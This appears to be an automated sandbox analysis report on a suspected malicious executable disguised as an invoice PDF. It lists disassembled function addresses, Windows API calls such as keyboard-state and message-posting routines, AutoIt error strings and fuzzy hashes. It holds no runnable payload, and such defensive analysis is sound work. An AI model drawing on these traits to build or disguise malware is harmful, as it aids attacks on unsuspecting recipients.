Instruction ID: 61b2e7129eb97acbeca5891d267d3487f72a20dd187edbdd3b69602293c7d7d0
Opcode Fuzzy Hash: b052d583835687b0c5e66397fabd623dd367a59914160ab0b7e6a30e5a391072
Instruction Fuzzy Hash: 0741D834A00209EBCF10DF69C945A9FBBB5BF48329F14915BE8146B392D779DA01CBD4

Function 0047C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0047C913

Strings

warning, xrefs: 0047C8FC
blank, xrefs: 0047C895
question, xrefs: 0047C8CC
stop, xrefs: 0047C8E4
info, xrefs: 0047C8B4

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: da685e691a2a880c087cbae40ceeebdd519494af2af04ae57b12b6c89776ffce
Instruction ID: 21ff85fea1f5f2ea39103eacf143a7c1e73e2a95a43c3f2567d7c8d498d5142b
Opcode Fuzzy Hash: da685e691a2a880c087cbae40ceeebdd519494af2af04ae57b12b6c89776ffce
Instruction Fuzzy Hash: 12112BB178930ABAA7006B149CC2DEB679CDF15319B21402FF608A6382D76C6D0052AD

Function 0047ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0047ED2A
_wcslen.LIBCMT ref: 0047ED3B
_wcslen.LIBCMT ref: 0047ED79
_wcslen.LIBCMT ref: 0047EDAF
_wcslen.LIBCMT ref: 0047EDDF
_wcslen.LIBCMT ref: 0047EDEF
_wcslen.LIBCMT ref: 0047EE2B
_wcslen.LIBCMT ref: 0047EE5A

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: f9c3f9204ef27489f36bcdff7212644f5214deb91c4c0603e7f10be9e5b25576
Instruction ID: 1734efafe1a5bf421d02fbefdca4c9ddb8c3307d0966683f1d77b2dafadc82fe
Opcode Fuzzy Hash: f9c3f9204ef27489f36bcdff7212644f5214deb91c4c0603e7f10be9e5b25576
Instruction Fuzzy Hash: 9241B465C1011875DB11EBB6888AACF77A8AF4D310F0095A7F518E3161FB3CE255C3AE

Function 0042F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0046682C,00000004,00000000,00000000), ref: 0042F953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0046682C,00000004,00000000,00000000), ref: 0046F3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0046682C,00000004,00000000,00000000), ref: 0046F454

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 2aa2447e6f49d28833af13ef0f09c1b97ba9820ccf9211e2db444395c33b0ed6
Instruction ID: f4f2621174da2dbcae1f2d9782b7a0e71618c96fab850a6fc96cd5e006374c0e
Opcode Fuzzy Hash: 2aa2447e6f49d28833af13ef0f09c1b97ba9820ccf9211e2db444395c33b0ed6
Instruction Fuzzy Hash: 97411BB1708690BAC7348B29B8C872B7BB1AB56314FD4403FE08756761D63D98C9CB1E

Function 004A2D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 004A2D1B
GetDC.USER32(00000000), ref: 004A2D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004A2D2E
ReleaseDC.USER32(00000000,00000000), ref: 004A2D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 004A2D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004A2D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,004A5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 004A2DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004A2DE1

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 7316aca04863058deed6b42e3504aef6f9b511fd35c6fe0b7ad1bdef8ef33d5e
Instruction ID: d856e670a8b8925bfa9cab915092b040a5f56776acca71eca82ad4298affb0a6
Opcode Fuzzy Hash: 7316aca04863058deed6b42e3504aef6f9b511fd35c6fe0b7ad1bdef8ef33d5e
Instruction Fuzzy Hash: 51318072201214BFEB518F54CC89FEB3FADEF1A755F044065FE089A291C6B59C51CBA8

Function 00475622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00475637
_memcmp.LIBVCRUNTIME ref: 00475659
_memcmp.LIBVCRUNTIME ref: 00475671
_memcmp.LIBVCRUNTIME ref: 00475684
_memcmp.LIBVCRUNTIME ref: 0047569E
_memcmp.LIBVCRUNTIME ref: 004756B1
_memcmp.LIBVCRUNTIME ref: 004756C9
_memcmp.LIBVCRUNTIME ref: 004756E4

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: f09c90ec28bd79cc54175b72e46c1bc452d5c0fa430c68cb4f18d814f5f72214
Instruction ID: 6aaefbd7a7b5e915b4a7130ec7be96634651264fc8830a9f4e49c14756843ba7
Opcode Fuzzy Hash: f09c90ec28bd79cc54175b72e46c1bc452d5c0fa430c68cb4f18d814f5f72214
Instruction Fuzzy Hash: 5921FC61640A0977E21855128D82FFB335CAF35398F548027FD0C9EA41F7ADEE1581ED

Function 00494FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 0049502E, 00495383
Not an Object type, xrefs: 00495007

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: b238fd80dd0d7ae740eb219830b6c307ec66457dcd0a67b74291a3a14f347149
Instruction ID: 8dec7c5331494979e5d36cd6c230bcdb9564d4360288d4de5feeed0ef83ed8b7
Opcode Fuzzy Hash: b238fd80dd0d7ae740eb219830b6c307ec66457dcd0a67b74291a3a14f347149
Instruction Fuzzy Hash: 7CD1B171A0060A9FDF11CFA8C881BAEBBB5BF48344F24807AE915AB381E774DD45CB54

Function 00451522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,004517FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 004515CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00451651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,004517FB,?,004517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 004516E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 004516FB

Part of subcall function 00443820: RtlAllocateHeap.NTDLL(00000000,?,004E1444,?,0042FDF5,?,?,0041A976,00000010,004E1440,004113FC,?,004113C6,?,00411129), ref: 00443852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00451777
__freea.LIBCMT ref: 004517A2
__freea.LIBCMT ref: 004517AE

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: eb0e1b495fce95ff45c970d785a36241d9353bc7e2e12e693997e5d6c088e61a
Instruction ID: 2d9fc0e671a93cb11dd0f2ad9e35df09db9d30e9d6593efe0ad0e6388275eadb
Opcode Fuzzy Hash: eb0e1b495fce95ff45c970d785a36241d9353bc7e2e12e693997e5d6c088e61a
Instruction Fuzzy Hash: 5D919571E00219ABDB208E74C881FEF7BA59F49715F14455BEC01E7262E739DC49CB68

Function 00494523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00494648
VariantInit.OLEAUT32(?), ref: 00494749
VariantClear.OLEAUT32(?), ref: 00494753
VariantClear.OLEAUT32(?), ref: 004947B0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 0049472C
Null Object assignment in FOR..IN loop, xrefs: 004945D8, 00494706, 004947BE

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: e05596ee36de16ad2963d07bb1ba177dee3d38fe1f446a4aeee9d7228aded1f4
Instruction ID: 49d1327ca34a333b24b80c15ad50ea4de85957ccdb0ea6a9acfa31d50e2c941a
Opcode Fuzzy Hash: e05596ee36de16ad2963d07bb1ba177dee3d38fe1f446a4aeee9d7228aded1f4
Instruction Fuzzy Hash: 23917671A00219ABDF24CF95C844FAF7BB8EF85714F10856AF505AB280D7789946CF64

Function 00481187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0048125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00481284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 004812A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 004812D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0048135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 004813C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00481430

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: aee331f254702f38886dcb4d288015d2289387f05f7cd37a655d3462f6966ce3
Instruction ID: 64fc30596eb504eb7ab17840d15f4c53607af06c0435327a91be93ebc5de8b8f
Opcode Fuzzy Hash: aee331f254702f38886dcb4d288015d2289387f05f7cd37a655d3462f6966ce3
Instruction Fuzzy Hash: 29910371A002189FDB00EF95C884BBE77B9FF49715F10486BE901E72A1D77CA946CB98

Function 0042948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 56b786534807ed635d9a112595599399987c437eff24ff106a30e51f28f5438f
Instruction ID: 05ca2aec769e6b47f8c426d4addd1e26013a7838f5e39a7bcea2991a43360470
Opcode Fuzzy Hash: 56b786534807ed635d9a112595599399987c437eff24ff106a30e51f28f5438f
Instruction Fuzzy Hash: A1913971A04219EFCB10CFA9D884AEEBBB8FF49324F54405AE515B7251D3789D82CB64

Function 00493947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0049396B
CharUpperBuffW.USER32(?,?), ref: 00493A7A
_wcslen.LIBCMT ref: 00493A8A
VariantClear.OLEAUT32(?), ref: 00493C1F

Part of subcall function 00480CDF: VariantInit.OLEAUT32(00000000), ref: 00480D1F
Part of subcall function 00480CDF: VariantCopy.OLEAUT32(?,?), ref: 00480D28
Part of subcall function 00480CDF: VariantClear.OLEAUT32(?), ref: 00480D34

Strings

Incorrect Parameter format, xrefs: 004939A6, 00493BA1
AUTOIT.ERROR, xrefs: 00493A80, 00493A85

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 88982912e204bbfa6657a811737a40fffd51642d03dd00ef088e26b1adb3d6da
Instruction ID: 7abff49528f9ca478c0ed716ea95a9677b8116d4d684bb9f2884dc78bc125727
Opcode Fuzzy Hash: 88982912e204bbfa6657a811737a40fffd51642d03dd00ef088e26b1adb3d6da
Instruction Fuzzy Hash: C6918F756083019FCB00DF25C49096ABBE5FF89319F14886EF88997351DB38EE45CB9A

Function 00494BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 0047000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0046FF41,80070057,?,?,?,0047035E), ref: 0047002B
Part of subcall function 0047000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0046FF41,80070057,?,?), ref: 00470046
Part of subcall function 0047000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0046FF41,80070057,?,?), ref: 00470054
Part of subcall function 0047000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0046FF41,80070057,?), ref: 00470064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00494C51
_wcslen.LIBCMT ref: 00494D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00494DCF
CoTaskMemFree.OLE32(?), ref: 00494DDA

Strings

NULL Pointer assignment, xrefs: 00494E23, 00494E52

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 034c0e50423b88157db3d55f6448d277a0f12507a72737709af303e6f75eee3d
Instruction ID: fb1e49d811127fe42ed8b59ade19fa264a589f5667d7a5bcdfb86709c6736fd3
Opcode Fuzzy Hash: 034c0e50423b88157db3d55f6448d277a0f12507a72737709af303e6f75eee3d
Instruction Fuzzy Hash: F6912871D0021DAFDF14DFA5C890EEEBBB8BF48314F10856AE919A7241DB389A45CF64

Function 0041BBE0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 232COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0041BEB3

Strings

x, xrefs: 0041BBE6
D%N, xrefs: 0041BCA2
D%ND%N, xrefs: 0041BCA5
D%N, xrefs: 0041BE9A
D%N, xrefs: 0041BDED, 0041BD91, 0041BD1B

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Init_thread_footer
String ID: D%N$D%N$D%N$D%ND%N$x
API String ID: 1385522511-1541170391
Opcode ID: 778719f60a104dcf0ccd177bdf84589ea30439dbf6684f63a5fdf9524693df48
Instruction ID: 6ea5914dde4d3614734cc7f24822dc5fde11845d43a37a4303ff65ac5b2307f6
Opcode Fuzzy Hash: 778719f60a104dcf0ccd177bdf84589ea30439dbf6684f63a5fdf9524693df48
Instruction Fuzzy Hash: 57916875A0020ADFCB18CF59C1906EAB7F1FF59310B24816ED941AB350E779AD81CBD8

Function 004A20FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 004A2183
GetMenuItemCount.USER32(00000000), ref: 004A21B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004A21DD
_wcslen.LIBCMT ref: 004A2213
GetMenuItemID.USER32(?,?), ref: 004A224D
GetSubMenu.USER32(?,?), ref: 004A225B

Part of subcall function 00473A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00473A57
Part of subcall function 00473A3D: GetCurrentThreadId.KERNEL32 ref: 00473A5E
Part of subcall function 00473A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004725B3), ref: 00473A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 004A22E3

Part of subcall function 0047E97B: Sleep.KERNEL32 ref: 0047E9F3

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 7734fa0b661b7c6431c5909c6b6f7e98ca168139d8d2d3609092fd6c7ffa3057
Instruction ID: 3ef26ecbc2bf3be259ad124bdf7b76e12a09e14050462215450b4c8d5e6bd8a2
Opcode Fuzzy Hash: 7734fa0b661b7c6431c5909c6b6f7e98ca168139d8d2d3609092fd6c7ffa3057
Instruction Fuzzy Hash: A271E476E00205AFCB00DF69C981AAEB7F1EF59314F1084AAE816EB341D778ED419B94

Function 0047AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0047AEF9
GetKeyboardState.USER32(?), ref: 0047AF0E
SetKeyboardState.USER32(?), ref: 0047AF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 0047AF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 0047AFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 0047AFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 0047B020

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 40ee27a15ad657b69e9c20263c7dba566f63bcabc90887c08775352c3cadb2c5
Instruction ID: d7e5f11b83c820724254a0923878970e609ff0f53a82abb492559a88144b401a
Opcode Fuzzy Hash: 40ee27a15ad657b69e9c20263c7dba566f63bcabc90887c08775352c3cadb2c5
Instruction Fuzzy Hash: A251C1A06087D53DFB3682348849BFB7EA99B46304F08C58AE1DD955C2C39CA894D79A

Function 0047ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 0047AD19
GetKeyboardState.USER32(?), ref: 0047AD2E
SetKeyboardState.USER32(?), ref: 0047AD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0047ADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0047ADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0047AE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0047AE38

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
